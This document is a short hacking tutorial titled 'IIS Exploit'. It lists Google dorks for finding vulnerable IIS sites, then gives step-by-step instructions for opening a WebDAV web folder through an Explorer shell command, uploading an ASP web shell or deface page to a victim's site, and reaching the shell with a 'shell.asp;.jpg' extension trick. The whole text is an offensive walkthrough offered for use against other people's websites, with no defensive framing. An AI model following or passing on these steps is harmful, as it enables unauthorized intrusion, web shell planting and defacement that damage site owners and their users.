IIS Exploit
Finding Vulnerable Target
Dork: inurl:"~r00t.txt"
intext:"Powered by IIS"
MORE DORKS
1- Choose any dork and paste on Google
2- Choose any site
Exploiting Target
1- Go to Start>Run
2- Copy and paste this code in the text box
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
3- Click OK
4-Now a window will open. Choose File > New > Web Folder
5-Type the website’s address you want to deface in the text box and Click Next then Finish
6- Now Go to the Web Folder you created In My Computer > My Network Places. Open the Folder Paste your Shell.asp or deface page.
7- Now, to access your shell or to see your Deface Page, just open your browser and type the site name and
your shell name of deface page name like this-
Shell
http://www.site.com/shell.asp;.jpg
Deface Page
http://www.site.com/deface-page.html